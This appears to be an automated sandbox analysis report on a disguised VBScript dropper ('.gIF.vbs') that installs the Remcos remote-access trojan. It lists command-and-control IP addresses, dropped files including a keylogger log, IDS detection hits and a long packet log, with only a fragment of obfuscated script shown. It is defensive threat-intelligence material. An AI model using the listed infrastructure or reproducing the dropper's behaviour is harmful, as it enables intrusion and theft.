                    1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • 192.210.214.9
                    IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
                    • 198.46.176.133
                    girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                    • 104.168.45.34
                    erthings.docGet hashmaliciousRemcosBrowse
                    • 192.3.101.142
                    No context
                    No context
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):962
                    Entropy (8bit):5.013130376969173
                    Encrypted:false
                    SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                    MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                    SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                    SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                    SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):1.1940658735648508
                    Encrypted:false
                    SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                    MD5:DA1F22117B9766A1F0220503765A5BA5
                    SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                    SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                    SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:@...e.................................R..............@..........
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):144
                    Entropy (8bit):3.3353212722345282
                    Encrypted:false
                    SSDEEP:3:rhlKlViNAUrlFi5JWRal2Jl+7R0DAlBG45klovDl6v:6lViNB25YcIeeDAlOWAv
                    MD5:DB88D492AFD66B7CEA273522B9C0A99F
                    SHA1:8B511299FA825FFA67069987C60AD6745BBDFA2D
                    SHA-256:6934D7CE49920C223681E5B7DEDFF43E4686CAB0BCCFCBFCB13418F5ED89BFA6
                    SHA-512:0D7F4471D5E623A07863D1B1CBDA7349CE73F26D181683EF74619DE5241B4C6B5180EFAE26A3344EE83AE7C92B6681B3FF95367A41C6469F6F878DF93CE43EB6
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\Notepo\logs.dat, Author: Joe Security
                    Preview:....[.2.0.2.4./.0.7./.2.7. .0.7.:.3.0.:.0.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe08c9441, page size 32768, DirtyShutdown, Windows version 10.0
                    Category:dropped
                    Size (bytes):20447232
                    Entropy (8bit):1.2830244229655756
                    Encrypted:false
                    SSDEEP:12288:BRSPOhijljKhBfv6Dv26+555ckQB8WBbXnE:eii9vDd+
                    MD5:055AE313AB942824682328B40617B1D8
                    SHA1:5EA51ADF9852F7B82186245CB903111BC8552E72
                    SHA-256:0B4A36F5771EF7528543447C76E0520BC83C412F95025A8CB11A9E719C5E4F8C
                    SHA-512:CF6458BFA597BB6A10BADAA98014F24060F712DCF89CD71ABCAA6C8B60DF0A6E633126C38071F4B03E7A897F01602CE0E29E74C414FEE13566D62FEE71F51334
                    Malicious:false
                    Preview:...A... ........=......J}...0...{........................"..........{i......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;...................................U.....{....................x......{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                    Category:dropped
                    Size (bytes):2
                    Entropy (8bit):1.0
                    Encrypted:false
                    SSDEEP:3:Qn:Qn
                    MD5:F3B25701FE362EC84616A93A45CE9998
                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                    Malicious:false
                    Preview:..
                    File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Entropy (8bit):3.584852358792161
                    TrID:
                    • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                    • MP3 audio (1001/1) 32.22%
                    • Lumena CEL bitmap (63/63) 2.03%
                    • Corel Photo Paint (41/41) 1.32%
                    File name:screensimplethingstohandlecream.gIF.vbs
                    File size:414'450 bytes
                    MD5:91143de27aed4b3ae7741994bc065faa
                    SHA1:85dfa644d5397b58383c94a4a898484a7fa5b8ce
                    SHA256:63062215f38fde4985340ec9f4fb8746320d830be8e0c534ab3fbae7d3e89f29
                    SHA512:e8cadd0faab189cf64253d2d7eaea5485224db55958a842917696f418e8f1d18349ed8f6f6bf1bc916d646e3baaa7e50c06f86094e30f30c619f3975473d22b2
                    SSDEEP:3072:3HGOwf9YFlhNe4VTdRnTT8w4TWlrqivBgoWpuV3d/S7GpqrsomlkjiveR4nV:Zwf9YFJrqA
                    TLSH:B8948D1262FE5008B2B33F54A9FA52254A3BBEDADC79C54D068C5A5D0BE3940DC74BB3
                    File Content Preview:..d.i.m. .m.o.r.u.l.a. .....m.o.r.u.l.a. .=. .r.o.m.p.e.n.t.e.....m.o.n.o.p.s.o.(.".g.a.n.d.u.m.".). .&. .m.o.r.u.l.a. .&. ._.....m.o.n.o.p.s.o.(.".m.u.c.u.n.h.a.m.b.a.m.b.e.".). .&. .m.o.r.u.l.a. .&. ._.....m.o.n.o.p.s.o.(.".x.a.j.a.".). .&. .m.o.r.u.l.a
                    Icon Hash:68d69b8f86ab9a86
                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                    2024-07-27T13:30:06.136562+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection4973218576192.168.2.4192.3.101.142
                    2024-07-27T13:30:07.666925+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection4973318576192.168.2.4192.3.101.142
                    2024-07-27T13:30:57.538052+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974120.114.59.183192.168.2.4
                    2024-07-27T13:30:03.723034+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image8049730198.46.176.133192.168.2.4
                    2024-07-27T13:30:19.338921+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973520.114.59.183192.168.2.4
                    2024-07-27T13:30:07.815303+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa4973480192.168.2.4178.237.33.50
                    2024-07-27T13:30:04.722143+0200TCP2020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M18049731192.3.176.154192.168.2.4
                    2024-07-27T13:30:02.639346+0200TCP2047750ET MALWARE Base64 Encoded MZ In Image8049730198.46.176.133192.168.2.4
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 27, 2024 13:30:01.590774059 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:01.595736027 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:01.595840931 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:01.596431971 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:01.601279974 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.120834112 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.120898008 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.120934010 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.121049881 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.121208906 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.121242046 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.121273041 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.121294022 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.121330023 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.121340036 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.121788025 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.121819973 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.121845007 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.121855021 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.121906996 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.127259016 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.127464056 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.127532005 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.210675955 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.210877895 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.210911989 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.211045980 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.211077929 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.211091995 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.211124897 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.211355925 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.211436033 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.211582899 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.211615086 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.211669922 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.211878061 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.211910963 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.211966991 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.212167978 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.212373972 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.212408066 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.212430000 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.212660074 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.212693930 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.212714911 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.212973118 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.213026047 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.213166952 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.213202000 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.213253975 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.213521957 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.213556051 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.213608980 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.213798046 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.213960886 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.214020967 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.218770027 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.260656118 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.303100109 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.303134918 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.303178072 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.303272963 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.303289890 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.303333044 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.303565025 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.303679943 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.303725004 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.303824902 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.303857088 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.303908110 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.304152012 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.304280996 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.304297924 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.304328918 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.304653883 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.304672956 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.304688931 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.304702044 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.304703951 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.304721117 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.304727077 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.304780960 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.305340052 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.305357933 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.305408955 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.305671930 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.305687904 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.305704117 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.305731058 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.306123972 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.306154966 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.306170940 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.306173086 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.306231976 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.306659937 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.306675911 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.306690931 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.306706905 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.306723118 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.306749105 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.307279110 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.307296038 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.307346106 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.307598114 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.307614088 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.307630062 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.307653904 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.308089018 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.308104992 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.308139086 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.344266891 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.344312906 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.344321966 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.344329119 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.344377995 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.605665922 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.605690956 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.605707884 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.605840921 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.606168032 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.606183052 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.606198072 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.606213093 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.606252909 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.606285095 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.606599092 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.606612921 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.606627941 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.606643915 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.606657982 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.606661081 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.606683969 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.606709003 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.607459068 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.607475996 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.607491016 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.607506990 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.607515097 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.607522011 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.607538939 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.607553005 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.607603073 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.608350039 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.608372927 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.608387947 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.608402967 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.608417034 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.608423948 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.608448982 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.609240055 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.609256029 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.609270096 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.609283924 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.609292030 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.609299898 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.609316111 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.609316111 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.609354019 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.610140085 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.610156059 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.610169888 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.610184908 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.610193014 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.610200882 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.610229015 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.610260010 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.611073971 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.611089945 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.611104012 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.611119986 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.611133099 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.611134052 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.611149073 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.611170053 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.611196041 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.612059116 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.612075090 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.612088919 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.612102985 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.612117052 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.612133980 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.612173080 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.612972021 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.612987995 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613003016 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613018036 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613033056 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613035917 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.613049030 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613075018 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.613750935 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613773108 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613794088 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613809109 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613810062 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.613825083 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613837957 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.613842010 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613857031 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613872051 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.613877058 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.613903999 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.614703894 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.614720106 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.614734888 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.614748955 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.614758968 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.614763975 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.614779949 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.614794970 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.614798069 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.614828110 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.614859104 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.615324974 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.615382910 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.615626097 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.615642071 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.615685940 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.615691900 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.615839958 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.615892887 CEST4973080192.168.2.4198.46.176.133
                    Jul 27, 2024 13:30:02.616024971 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.616039991 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.616054058 CEST8049730198.46.176.133192.168.2.4
                    Jul 27, 2024 13:30:02.616069078 CEST8049730198.46.176.133192.168.2.4
